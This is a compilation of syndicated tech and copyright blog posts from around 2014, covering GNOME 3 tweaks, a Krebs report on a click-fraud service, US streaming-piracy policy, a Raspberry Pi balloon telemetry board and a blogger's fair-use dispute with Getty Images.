The seeds of the “endless loop” phenomenon were also experienced by HBO for a while, with the anti-piracy company sending notices (such as this one) targeting dozens of Chilling Effects pages listing notices previously sent by the company.

While publishing notices is entirely legal, the potential for these loops really angers some notice senders.

On April 10 this year a Peter Walley sent a notice to Google complaining that his book was being made available on a “pirate site” without permission. Google removed the link in its indexes but, as is standard practice, linked to the notice on Chilling Effects. This enraged Walley.

chilling4

None of these rantings had any effect, except to place yet another notice on Chilling Effects highlighting where the infringing material could be found.

It’s a lesson others should learn from too.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Linux How-Tos and Linux Tutorials: Easy Steps to Make GNOME 3 More Efficient

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Few Linux desktops have brought about such controversy as GNOME 3. It’s been ridiculed, scorned, and hated since it was first released. Thing is, it’s actually a very good desktop. It’s solid, reliable, stable, elegant, simple… and with a few minor tweaks and additions, it can be made into one of the most efficient and user-friendly desktops on the market.

Of course, what makes for an efficient and/or user-friendly desktop? That is subject to opinion — something everyone has. Ultimately, my goal is to help you gain faster access to the apps and the files you use. Simple. Believe it or not, stepping GNOME 3 up into the world of higher efficiency and user-friendliness is quite an easy task — you just have to know where to look and what to do. I am here to point you in the right directions.

I decided to go about this process by first installing a clean Ubuntu GNOME distribution that included GNOME 3.12. With the GNOME-centric desktop ready to go, it’s time to start tweaking.

Add window buttons

For some unknown reason, the developers of GNOME decided to shrug off the standard window buttons (Close, Minimize, Maximize) in favor of a single Close button. I get the lack of a Maximize button (since you can simply drag the window to the top of the screen to maximize) and you can also gain access to the minimize/maximize actions by right-clicking the titlebar and selecting either Minimize or Maximize. This behavior simply adds steps, so the lack of a minimize button is a bit confounding. Fortunately, there’s an easy fix for this. Here’s how:

By default, you should have the GNOME Tweak Tool installed. With this tool you can turn on either/or the Maximize or Minimize buttons (Figure 1).

gnome3-max-min-window

Once added, you’ll see the Minimize button, to the left of the close button, ready to serve. Your windows are now more easy to manage.

From the same tweak tool, you can configure a number of other helpful aspects of GNOME:

  • Set window focus mode

  • Set system fonts

  • Set the GNOME theme

  • Add startup applications

  • Add extensions. 

Add extensions

One of the best features of GNOME 3 are shell extensions. These extensions bring all sorts of handy features to GNOME. With shell extensions, there’s no need to install from the package manager, you either visit the GNOME Shell Extension site, search for the extension you want to add, click on the extension listing, click the On button, and then okay the installation of the extension or you add them from within the GNOME Tweak Tool (you’ll find more available extensions through the web site).

NOTE: You may have to allow the installation of extensions through your browser. If this is the case, you’ll be given a warning when you first visit the GNOME Shell Extension site. Just click Allow when prompted.

One of the more impressive (and handy extensions) is Dash to Dock. This extension moves the Dash out of the application overview and turns it into a fairly standard dock (Figure 2).

gnome3-dash

As you add applications to the Dash, they will also be added to the Dash to Dock. You also get quick access to the applications overview, by clicking the 6-dotted icon at the bottom of the Dock.

There are plenty of other extensions focused on making GNOME 3 a more efficient desktop. Some of the better extensions include:

  • Recent items: Add a drop-down menu of recently used items to your panel.

  • Search Firefox Bookmarks Provider: Search (and launch) your bookmarks from the Overview.

  • Quicklists: Add a quicklist popup menu to Dash icons (which allows you to quickly open new documents associated with the application, and more).

  • Todo List: Adds a drop-down in the panel that allows you to add items lists.

  • Web Search Dialog: Allows you to quickly search the web by hitting Ctrl+Space and entering a string of text (results appear in a new browser tab). 

Add a complete dock

If the Dash to Dock is too limiting for you (say you want a notification area and more), one of my favorite docks is Cairo Dock (Figure 3). This amazing addition to GNOME 3 will go a long way to up the efficiency of the desktop. With it, you can add/remove applications, get quick access to shortcuts (folders such as Documents, Downloads, Music, and Videos), add applets (such as RSS reader, wi-fi indicator, netspeed, drop-to-share, and more). Cairo also allows themes and OpenGL hardware acceleration support.

gnome3 Cairo dock

With Cairo Dock added to GNOME 3, your experience will be made exponentially better. Install this great dock from within your distribution’s package manager.

GNOME 3 doesn’t have to be seen as an inefficient, user UN-friendly, desktop. With just a tiny bit of tweaking, GNOME 3 can be made as powerful and user-friendly as any desktop available.

Krebs on Security: Service Drains Competitors’ Online Ad Budget

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The longer one lurks in the Internet underground, the more difficult it becomes to ignore the harsh reality that for nearly every legitimate online business there is a cybercrime-oriented anti-business. Case in point: Today’s post looks at a popular service that helps crooked online marketers exhaust the Google AdWords budgets of their competitors.

Youtube ads from "GoodGoogle" pitching his AdWords click fraud service.

Youtube ads from “GoodGoogle” pitching his AdWords click fraud service.

AdWords is Google’s paid advertising product, displaying ads on the top or the right side of your screen in search results. Advertisers bid on specific keywords, and those who bid the highest will have their ads show up first when Internet users search for those terms. In turn, advertisers pay Google a small amount each time a user clicks on one of their ads.

One of the more well-known forms of online ad fraud (a.k.a. “click fraud“) involves Google AdSense publishers that automate the clicking of ads appearing on their own Web sites in order to inflate ad revenue. But fraudsters also engage in an opposite scam involving AdWords, in which advertisers try to attack competitors by raising their costs or exhausting their ad budgets early in the day.

Enter “GoodGoogle,” the nickname chosen by one of the more established AdWords fraudsters operating on the Russian-language crime forums.  Using a combination of custom software and hands-on customer service, GoodGoogle promises clients the ability to block the appearance of competitors’ ads.

“Are you tired of the competition in Google AdWords that take your first position and quality traffic,?” reads GoodGoogle’s pitch. “I will help you get rid once and for all competitors in Google Adwords.”

The service, which appears to have been in the offering since at least January 2012, provides customers both a la carte and subscription rates. The prices range from $100 to block between three to ten ad units for 24 hours to $80 for 15 to 30 ad units. For a flat fee of $1,000, small businesses can use GoodGoogle’s software and service to sideline a handful of competitors’s ads indefinitely. Fees are paid up-front and in virtual currencies (WebMoney, e.g.), and the seller offers support and a warranty for his work for the first three weeks.

Reached via instant message, GoodGoogle declined to specify how his product works, instead referring me to several forums where I could find dozens of happy customers to vouch for the efficacy of the service.

Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University California, Berkeley, speculated that GoodGoogle’s service consists of two main components: A private botnet of hacked computers that do the clicking on ads, and advanced software that controls the clicking activity of the botted computers so that it appears to be done organically from search results.

Further, he said, the click fraud bots probably are not used for any other purpose (such as spam or denial-of-service attacks) since doing so would risk landing those bots on lists of Internet addresses that Google and other large Internet companies use to keep track of abuse complaints.

“You’d pretty much have to do this kind of thing as a service, because if you do it just using software alone, you aren’t going to be able to get a wide variety of traffic,” Weaver said. “Otherwise, you’re going to start triggering alarms.”

Amazingly, the individual responsible for this service not only invokes Google’s trademark in his nickname and advertises his wares via instructional videos on Google’s YouTube service, but he also lists several Gmail accounts as points of contact. My guess is it will not be difficult for Google to shutter this operation, and possibly to identity this individual in real life.

TorrentFreak: US Wants to Criminalize Movie and Music Streaming

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

streamingYesterday the House Judiciary Committee held a hearing on punishments for and remedies against online copyright infringement. One of the speakers was David Bitkower, Acting Deputy Assistant Attorney General, who laid out the wishes of the Obama administration.

After praising previous successes, such as the shutdown of Megaupload and the prosecution of several IMAGiNE members, Bitkower explained the evolving challenges copyright holders are dealing with.

From illegal piano rolls in the early 1900s to floppy disks a century later, new technologies have presented new threats, he argued. With the rise of broadband access this process has worsened and the most recent challenge is combating illegal streaming services.

“One new challenge confronting copyright owners and law enforcement authorities is the rise of Internet ‘streaming’ as the dominant means of disseminating many types of copyrighted content online. This activity also derives from advances in technology: in this case, the growth in availability of high-speed Internet to the average consumer,” Bitkower said.

The problem for the Department of Justice and copyright holders is that these services are harder to prosecute. Technically, streaming doesn’t count as distribution but as a public performance, which can only be charged as a misdemeanor.

The administration tried to remedy this in 2012, by implementing the SOPA and PIPA bills, but these were shelved after public outrage. Many people feared that uploading copyrighted YouTube videos could possibly land them in jail and took their concerns to the streets.

However, fast forward a few years and the same plan is back on the table.

“The Administration recommends that Congress amend the law to create a felony penalty for unauthorized Internet streaming. Specifically, we recommend the creation of legislation to establish a felony charge for infringement through unauthorized public performances conducted for commercial advantage or private financial gain,” Bitkower explained.

“It would emphasize the seriousness of the threat that unauthorized streaming poses to legitimate copyright holders, clarify the scope of conduct deemed to be illegal in order to deter potential infringers, and provide the Department with an important tool to prosecute and deter illicit Internet streaming.”

In addition to criminalizing illicit streaming, Bitkower also called for persistent funds to support its international operations. In recent years the DoJ has educated police forces abroad to deal with copyright infringement. This apparently includes training on very basic skills, such as how to connect to the Internet in the first place.

“The program has realized numerous successes, including a Ukrainian police officer who, after receiving training, was able to use a dial-up Internet connection from his home computer to bring down the largest illegal file sharing service in his country,” Bitkower said.

The international program helped to shut down Megaupload, but could also target The Pirate Bay through tools such as “diplomatic and trade-based pressure.” Worryingly, the United States has trouble getting the facts rights, as it believes that the political Pirate Party is connected to The Pirate Bay.

“In addition to the Mega Conspiracy described above, we have seen The Pirate Bay start as a file sharing site for unauthorized copies of works in Sweden, expand to other countries, and even develop its own political party in Europe,” Bitkower noted.

Mistakes aside, it’s clear that the Obama administration hasn’t lost its focus on copyright infringement.

All recommendations are aimed at more prosecutions, more international pressure and tougher punishments for pirates. Time will tell whether they can get Congress to agree this time around.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: Interview with Nathan Willis, GUADEC Keynote Speaker (GNOME News)

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

LWN editor Nathan Willis is giving a keynote talk at the upcoming GUADEC (GNOME Users and Developers European Conference) and was interviewed by GNOME News. Willis’s talk is titled “Should We Teach The Robot To Kill” and will look at free software and the automotive industry. “And, finally, my ultimate goal would be to persuade some people that the free-software community can — and should — take up the challenge and view the car as a first-rate environment where free software belongs. Because there will naturally be lots of little gaps where the different corporate projects don’t quite have every angle covered. But we don’t have to wait for other giant companies to come along and finish the job. We can get involved now, and if we do, then the next generation of automotive software will be stronger for it, both in terms of features and in terms of free-software ideals.” GUADEC is being held in Strasbourg, France July 26–August 1.

Raspberry Pi: Pi in the Sky: hardware for high-altitude balloonists from Dave Akerman

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

Liz: Regular readers will be very familiar with the name Dave Akerman. Dave has been sending Raspberry Pis to the stratosphere under weather balloons since we launched the Pi in 2012, and his work in helping schools develop their own in-house space programs has been fantastic to watch. He and his friend Anthony Stirk have just produced a telemetry add-on board for the Raspberry Pi to help schools (and everybody else) reproduce the sort of spectacular results you’ve seen from him before. Here he is to introduce it: over to you, Dave!

High Altitude Ballooning is an increasingly popular hobby (I nearly said that interest has been “ballooning”, but fortunately I stopped myself just in time …), bringing what is termed “near space” within the reach of pretty much anyone who is willing to put in the effort and spend a moderate amount of money.

moon and sky from stratosphere

 

Although it’s possible to successfully fly and retrieve a balloon with a simple GSM/GPS tracker, the chances are that this will end in failure and tears. GSM coverage in the UK is nowhere near 100%, especially in rural areas which is where we want (and aim) the flights to land. The next step up, in reliability and price, is a “Spot” tracker which works solely via satellites, but those don’t work if they land upside down. Also, neither of these solutions will tell you how high the flight got, or record any science data (e.g. temperature, pressure), or indeed tell you anything about the flight until they land. If you’re lucky. A lost flight is a sad thing indeed.

pic from stratosphere

 

For some countries (e.g. USA, but not the UK), if you are a licensed amateur radio operator you can fly an APRS tracker, in which case the flight will be tracked for you via the ground-based APRS network run by other radio hams. Sadly UK laws prohibit radio hams transmitting from an airborne vehicle, so APRS is out for us.

For these reasons, pretty much everyone involved in the hobby in the UK, and many other countries, uses radio trackers operating in an ISM (Industrial, Scientific and Medical) band where airborne usage is allowed. These work throughout the flight, transmitting GPS co-ordinates plus temperature and anything else that you can add a sensor for. Many radio trackers can also send down live images, meaning that you can see what your flight is seeing without having to wait for it to land. Here’s a diagram showing how telemetry from the flight ends up as a balloon icon on a Google map:

tracking system

 

What’s not shown here is that, provided you tell them, the other balloonists will help track for you. So not only will you be receiving telemetry and images directly via your own radio receiver, but others will do to. All received data is collated on a server so if you do lose contact with the flight briefly then it doesn’t matter. However, this does not mean you can leave the tracking up to others! You’ll need to receive at the launch site (you have to make sure it’s working!) and also in the chase car once it lands. The expense of doing this is small – a TV dongle for £12 or so will do it, with a £15 aerial and a laptop, ideally with a 3G dongle or tethered to a phone.

Traditionally, balloonists build their own radio trackers, and for anyone with the skills or the time and ability to learn programming and some digital electronics, this is definitely the most rewarding route to take. Imagine receiving pictures of the Earth from 30km up, using a piece of kit that you designed and built and programmed! So if you are up to this challenge (and I suspect that most people reading are) then I recommend that you do just that. It takes a while, but during the development you’ll have plenty of time to research other aspects of the hobby (how to predict the flight path, and obtain permission, and fill the balloon, etc.). And when you’re done, you can hold in your hand something that is all your own work and has, to all intents and purposes, been to space.

weather balloon bursting

 

For some though, it’s just not practical to develop a new tracker. Or you might be a programming whizz, but not know which end of a soldering iron to pick up. It was with these people in mind that we (myself and Anthony Stirk – another high altitude balloonist) developed our “Pi In The Sky” telemetry board. Our principle aim is to enable schools to launch balloon flights with radio trackers, without having to develop the hardware and software first. It is also our hope that older children and students will write their own software or at least modify the provided (open source) software, perhaps connecting and writing code for extra sensors (the board has an i2c connection for add-ons).

The board and software are based on what I’ve been flying since my first “Pi In The Sky” flight over 2 years ago, so the technology has been very well proven (approximately 18 flights and no losses other than deliberate ones!). So far the board itself has clocked up 5 successful flights, with the released open-source software on 3 of those. Here’s the board mounted to a model B (though we very strongly recommend use of a model A, which consumes less power and weighs less):

Pi in the Sky board

It comes in a kit complete with a GPS antenna, SMA pigtail (from which you can easily make your own radio aerial), stand-offs for a rigid mounting to the Pi board, and battery connectors. Software is on https://github.com/piinthesky, with installation instructions at http://www.pi-in-the-sky.com/index.php?id=support, or there is a pre-built SD card image for the tragically lazy. We do recommend manual installation as you’ll learn a lot.

By now you’re probably itching to buy a board and go fly it next weekend. Please don’t. Well, buy the board by all means, but from the moment you decide that this is the project for you, you should task yourself with finding out all you can about how to make your flight a safe success. For a start, this means learning about applying for flight permission (which, if you want to launch from your garden at the end of an airport runway, isn’t going to be given). Permission is provided together with a NOTAM (NOtice To AirMen) which tells said pilots what/where/when your launch will be, so they can take a different path. You also need to learn about predicting the flight path so that it lands well away from towns or cities or motorways or airports. I hope I don’t need to explain how important all of this is.

IMG_0690-e1404813775746-768x1024

 

There’s lots more to learn about too, for example:

  • How to track the flight
  • How to fill a balloon
  • Where to buy the balloon
  • What size balloon? What size parachute? How to tie it all together?

None of this is complicated (it’s not, ahem “rocket science”), but there is a lot to know. Don’t be surprised if the time between “I’ll do it!” and “Wow, I did it!” is measured in months. Several of them. In fact, worry if it’s less than that – this research takes time. We will be producing some teaching materials, but meantime please see the following links:

As for the board, it provides a number of features borne out of a large number of successful flights:

  • Efficient built-in power regulator providing run time of over 20 hours from 4 AA cells (using a model A Pi)
  • Highly sensitive UBlox GPS receiver approved for altitudes up to 50km
  • Temperature compensated, license-free (Europe) frequency agile, 434MHz radio transmitter
  • Temperature sensor
  • Battery voltage monitoring
  • Sockets for external i2c devices, analog input, external temperature sensor
  • Allows use of Raspberry Pi camera
  • Mounting holes and spacers for a solid connection to the Pi

The open-source software provides these features:

  • Radio telemetry with GPS and sensor data using UKHAS standard
  • Radio image download using SSDV standard
  • Multi-threaded to maximize use of the radio bandwidth
  • Variable image size according to altitude
  • Stores full-definition images as well as smaller transmitted images
  • Automatically chooses better images for download
  • Configurable via text file in the Windows-visible partition of the SD card
  • Supplied as github repository with instructions, or SD card image

Finally, anyone interested in high altitude ballooning, using our board or not, should come to the UKHAS Conference on 16th August 2014 at the University of Greenwich. Anthony and I will be presenting our board during the morning sessions, and will run a workshop on the board in the afternoon. For tickets click here.

The Hacker Factor Blog: A Victory for Fair Use

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Last week I reported on a copyright infringement letter that I had received from Getty Images. The extremely hostile letter claimed that I was using a picture in violation of their copyright, ordered me to “cease and desist” using the picture, and demanded that I pay $475 in damages. Various outlets have referred to this letter as trolling and extortion.

Not being an attorney, I contacted my good friend, Mark D. Rasch. Mark is a well-known attorney in the computer security world. Mark headed the United States Department of Justice Computer Crime Unit for nine years and prosecuted cases ranging from computer crime and fraud to digital trespassing and viruses. If you’re old enough, then you remember the Hanover Hackers mentioned in The Cuckoo’s Egg, Robert Morris Jr. (first Internet worm), and Kevin Mitnick — Mark worked all of those prosecutions. He regularly speaks at conferences, appears in news interviews, and has taught cyberlaw to law enforcement and big universities. (If I were a big company looking for a chief privacy officer, I would hire him in a second.)

This letter from Getty had me concerned. But I can honestly say that, in the 12 years that I’ve known him, I have never seen Mark so animated about an issue. I have only ever seen him as a friendly guy who gives extremely informative advice. This time, I saw a side of Mark that I, as a friend, have never experienced. I would never want to be on the other side of the table from him. And even being on the same side was really intimidating. (Another friend told me that Mark has a reputation for being an aggressive bulldog. And this was my first time seeing his teeth.) His first advice to me was very straightforward. He said, “You have three options. One, do nothing. Two, send back a letter, and three, sue them.” Neither of us were fond of option #1. After a little discussion, I decided to do option #2 and prepare for #3.

First I sent the response letter. Then I took Mark’s advice and began to prepare for a lawsuit. Mark wanted me to take the initiative and file for a “Copyright Declaratory Judgment“. (Don’t wait for Getty.) In effect, I wanted the court to declare my use to be Fair Use.

Getty’s Reply

I honestly expected one of three outcomes from my response letter to Getty Images. Either (A) Getty would do nothing, in which case I would file for the Declaratory Judgment, or (B) Getty would respond with their escalation letter, demanding more money (in which case I would still file for the Declaratory Judgment), or (C) Getty would outright sue me, in which case I would respond however my attorney advised.

But that isn’t what happened. Remarkably, Getty backed down! Here’s the letter that they sent me (I’m only censoring email addresses):

From: License Compliance
To: Dr. Neal Krawetz
Subject: [371842247 Hacker Factor ]
Date: Tue, 22 Jul 2014 20:51:13 +0000

Dr. Krawetz:

We have reviewed your email and website and are taking no further action. Please disregard the offer letter that has been presented in this case. If you have any further questions or concerns, please do not hesitate to contact us.

Nancy Monson
Copyright Compliance Specialist
Getty Images Headquarters
605 Fifth Avenue South, Suite 400
Seattle WA 98104 USA
Phone 1 206 925 6125
Fax 1 206 925 5001
[redacted]@gettyimages.com

For more information about the Getty Images License Compliance Program, please visit http://company.gettyimages.com/license-compliance

Helpful information about image copyright rules and how to license stock photos is located at www.stockphotorights.com and Copyright 101.

Getty Images is leading the way in creating a more visual world. Our new embed feature makes it easy, legal, and free for anybody to share some of our images on websites, blogs, and social media platforms.
http://www.gettyimages.com/Creative/Frontdoor/embed

(c)2014 Getty Images, Inc.

PRIVILEGED AND CONFIDENTIAL
This message may contain privileged or confidential information and is intended only for the individual named. If you are not the named addressee or an employee or agent responsible for delivering this message to the intended recipient you should not disseminate, distribute or copy this e-mail or any attachments hereto. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail and any attachments from your system without copying or disclosing the contents. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise as a result of e-mail transmission. If verification is required please request a hard-copy version. Getty Images, 605 5th Avenue South, Suite 400. Seattle WA 98104 USA, www.gettyimages.com. PLEASE NOTE that all incoming e-mails will be automatically scanned by us and by an external service provider to eliminate unsolicited promotional e-mails (“spam”). This could result in deletion of a legitimate e-mail before it is read by its intended recipient at our firm. Please tell us if you have concerns about this automatic filtering.

Mark Rasch also pointed out that Getty explicitly copyrighted their email to me. However, the same Fair Use that permits me to use their pictures also permits me to post their entire email message. And that whole “PRIVILEGED AND CONFIDENTIAL” paragraph? That’s garbage and can be ignored because I never agreed to their terms.

Findings

In preparing to file the Copyright Declaratory Judgment, I performed my due diligence by checking web logs and related files for information pertaining to this case. And since Getty has recanted, I am making some of my findings public.

Automated Filing
First, notice how Getty’s second letter says “We have reviewed your email and website…” This clearly shows up in my web logs. Among other things, people at Getty are the only (non-bot) visitors to access my site via “nealkrawetz.org” — everyone else uses “hackerfactor.com”. In each case, the Getty users initially went directly to my “In The Flesh” blog entry (showing that they were not searching or just browsing my site.) Their automated violation bot also used nealkrawetz.org. The big catch is that nobody at Getty ever reviewed “In The Flesh” prior to mailing their extortion letter.

In fact, I can see exactly when their bot visited my web site. Here are all of my logs related to their bot:

2014-06-08 23:41:44 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-08 23:41:44 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-09 21:08:00 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-09 21:08:00 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-14 23:05:36 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-14 23:05:36 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-14 23:05:44 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET /blog/index.php?/archives/423-In-The-Flesh.html | http://ops.picscout.com/QcApp/PreReport/Index/371842247?normalFlow=True
2014-06-14 23:06:39 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET /blog/index.php?/categories/18-Phones | http://ops.picscout.com/QcApp/Infringer/Index/371842247
2014-06-16 05:35:47 | 95.35.10.33 | Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-16 05:35:47 | 95.35.10.33 | Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247

This listing shows:

  • The date/time (in PST)
  • The bot’s IP address (two in Israel and one in India; none from the United States)
  • The user-agent string sent by the bot
  • Where they went — they most went to “/” (my homepage), but there is exactly one that went to “/blog/index.php?/archives/423-In-The-Flesh.html”. That’s when they compiled their complaint.
  • The “Referer” string, showing what they clicked in order to get to my site. Notice how their accesses are associated with a couple of complaint numbers. “371842247″ is the number associated with their extortion letter. However, “371654690″ appears to be a second potential complaint.

Getty’s complaint has a very specific timestamp on the letter. It’s doesn’t just have a date. Instead, it says “7/10/2014 11:05:05am” — a very specific time. The clocks may be off by a few seconds, but that “11:05″ matches my log file — it is off by exactly 12 hours. (The letter is timestamped 11:05am, and my logs recorded 11:05pm.) This shows that the entire filing process is automated.

When I use my bank’s online bill-pay system, it asks me when I want to have the letter delivered. Within the United States, it usually means mailing the letter four days earlier. I believe that Getty did the exact same thing. They scanned my web site and then mailed their letter so it would be delivered exactly one-month later, and dated the letter 4 days 12 hours before delivery.

Getty’s automated PicScout system is definitely a poorly-behaved web bot. At no time did Getty’s PicScout system retrieve my robots.txt file, showing that it fails to abide by Internet standards. I am also certain that this was a bot since a human’s web browser would have downloaded my blog’s CSS style sheet. (PicScout only downloaded the web page.)

Failure to perform due diligence
I want to emphasize that there are no other accesses to that blog entry by any address associated with Getty within months before their complaint. As of this year (from January 2014 to July 23, 2014), people at Getty have only visited the “In The Flesh” web page 13 times: once by the PicScout bot, and 12 times after they received my reply letter. This shows that Getty never viewed the web page prior to sending their letter. In effect, their “infringement” letter is nothing more than trolling and an attempt to extort money. They sent the letter without ever looking at the context in which the picture is used.

My claim that Getty never manually reviewed my web site prior to mailing is also supported by their second letter, where they recanted their claim of copyright infringement. Having actually looked at my blog, they realized that it was Fair Use.

My web logs are not my only proof that no human at Getty viewed the blog page in the months prior to sending the complaint. Getty’s threatening letter mentions only one single picture that is clearly labeled with Getty’s ImageBank watermark. However, if any human had visited the web page, then they would have seen FOUR pictures that are clearly associated with Getty, and all four pictures were adjacent on the web page! The four pictures are:

The first picture clearly says “GettyImages” in the top left corner. The second picture (from their complaint) is watermarked with Getty’s ImageBank logo. The third and fourth pictures come from Getty’s iStockPhoto service. Each photo was properly used as part of the research results in that blog entry. (And right now, they are properly used in the research findings of this blog entry.)

After Getty received my reply letter, they began to visit the “In The Flesh” URL from 216.169.250.12 — Getty’s corporate outbound web proxy address. Based on the reasonable assumption that different browser user-agent strings indicate different people, I observed them repeatedly visiting my site in groups of 3-5 people. Most of them initially visited the “In The Flesh” page at nealkrawetz.org; a few users visited my “About Me” and “Services” web pages. I am very confident that these indicate their attorneys reviewing my reply letter and web site. This is the absolute minimum evaluation that Getty should have done before sending their extortion letter.

Legal Issues
Besides pointing out how my blog entry clearly falls under Fair Use, my attorney noted a number of items that I (as a non-lawyer person) didn’t see. For example:

  • In Getty’s initial copyright complaint, they assert that they own the copyright. However, the burden of proof is on Getty Images. Getty provided no proof that they are the actual copyright holder, that they acquired the rights legally from the photographer, that they never transferred rights to anyone else, that they had a model release letter from the woman in the photo, that the picture was never made public domain, and that the copyright had not expired. In effect, they never showed that they actually have the copyright.

  • Getty’s complaint letter claims that they have searched their records and found no license for me to use that photo. However, they provided no proof that they ever searched their records. At minimum, during discovery I would demand a copy of all of their records so that I could confirm their findings and proof of their search. (Remember, the burden of proof is on Getty, not on me.) In addition, I have found public comments that explicitly identify people with valid licenses who reported receiving these hostile letters from Getty. This brings up the entire issue regarding how Getty maintains and searches their records.
  • Assuming some kind of violation (and I am not admitting any wrong here), there is a three-year statute of limitations regarding copyright infringement. My blog entry was posted on March 18, 2011. In contrast, their complaint letter was dated July 10, 2014 — that is more than three years after the pictures were posted on my site.

Known Research
Copyright law permits Fair Use for many purposes, including “research”. Even Getty’s own FAQ explicitly mentions “research” as an acceptable form of Fair Use. The question then becomes: am I a researcher and does my blog report on research? (Among other things, this goes toward my background section in the Copyright Declaratory Judgment filing.)

As it turns out, my web logs are extremely telling. I can see each time anyone at any network address associated with Getty Images visits my site. For most of my blog entries, I either get no Getty visitors or a few visitors. However, each time I post an in-depth research entry on digital photo forensics, I see large groups of people at Getty visiting the blog entry. I can even see when one Getty person comes through, and then a bunch of other Getty people visit my site — suggesting that one person told his coworkers about the blog entry. In effect, employees at Getty Images have been regular readers of my blog since at least 2011. (For discovery, I would request a forensic image of every computer in Getty’s company that has accessed my web site in order to determine if they used my site for research.)

Getty users also use my online analysis service, FotoForensics. This service is explicitly a research service. There are plenty of examples of Getty users accessing the FotoForensics site to view analysis images, read tutorials, and even upload pictures with test files that have names like “watermark.jpg” and “watermark-removed.jpg”. This explicitly shows that they are using my site as a research tool.

(For the ultra paranoid people: I have neither the time nor the desire to track down every user in my web logs. But if you send me a legal threat, I will grep through the data.)

However, the list does not stop there. For example, the Harvard Reference Guide lists me as the example for citing research from a blog. (PDF: see PDF page 44, document page 42.) Not only does Getty use my site as a research resource, Harvard’s style guide uses me as the example for a research blog (my bold for emphasis).

Blogs are NOT acceptable academic sources unless as objects of research

Paraphrasing, Author Prominent:
Krawetz (2011) uses a blog to discuss advanced forensic image analysis techniques.

Paraphrasing, Information Prominent:
Blogs may give credence to opinion, in some cases with supporting evidence; for example the claim that many images of fashion models have been digitally enhanced (Krawetz 2011).

Reference List Model:
Krawetz, N 2011, ‘The hacker factor blog’, web log, viewed 15 November 2011, http://www.hackerfactor.com/blog/

I should also point out that the AP and Reuters have both been very aware of my blog — including a VP at the AP — and neither has accused me of copyright infringement. They appear to recognize this as Fair Use. Moreover, with one of blog entries on a Reuters photo (Without a Crutch), a Reuters editor referred to the blog entry as a “Great in-depth analysis” on Reuter’s web site (see Sep 30, 2011) and on her twitter feed. This shows that Getty’s direct competition recognize my blog as a research resource.

SLAPP
One of the things my attorney mentioned was California’s Anti-SLAPP law. Wikipedia explains SLAPP, or Strategic Lawsuit Against Public Participation, as “a lawsuit that is intended to censor, intimidate, and silence critics by burdening them with the cost of a legal defense until they abandon their criticism or opposition.” Wikipedia also says:

The plaintiff’s goals are accomplished if the defendant succumbs to fear, intimidation, mounting legal costs or simple exhaustion and abandons the criticism. A SLAPP may also intimidate others from participating in the debate. A SLAPP is often preceded by a legal threat. The difficulty is that plaintiffs do not present themselves to the Court admitting that their intent is to censor, intimidate or silence their critics.

In this case, Getty preceded to send me a legal threat regarding alleged copyright infringement. Then they demanded $475 and threatened more actions if I failed to pay it. In contrast, it would cost me $400 to file for a Declaratory Judgment (more if I lived in other states), and costs could rise dramatically if Getty filed a lawsuit against me. In either scenario, it places a financial burden on me if I want to defend my First Amendment rights.

In the United States, California has special anti-SLAPP legislation. While not essential, it helps that Getty has offices in California and a network trace shows that some packets went from Getty to my blog through routers in California. As Wikipedia explains:

To win an anti-SLAPP motion, the defendant must first show that the lawsuit is based on claims related to constitutionally protected activities, typically First Amendment rights such as free speech, and typically seeks to show that the claim lacks any basis of genuine substance, legal underpinnings, evidence, or prospect of success. If this is demonstrated then the burden shifts to the plaintiff, to affirmatively present evidence demonstrating a reasonable probability of succeeding in their case by showing an actual wrong would exist as recognized by law, if the facts claimed were borne out.

This isn’t even half of his legal advice. I could barely take notes fast enough as he remarked about topics like Rule 11, tortious interference with a business relationship, Groucho Marx’s reply to Warner Brothers, and how Getty’s repeated access to my web site could be their way to inflate potential damage claims (since damages are based on the number of views).

A Little Due Diligence Goes A Long Way

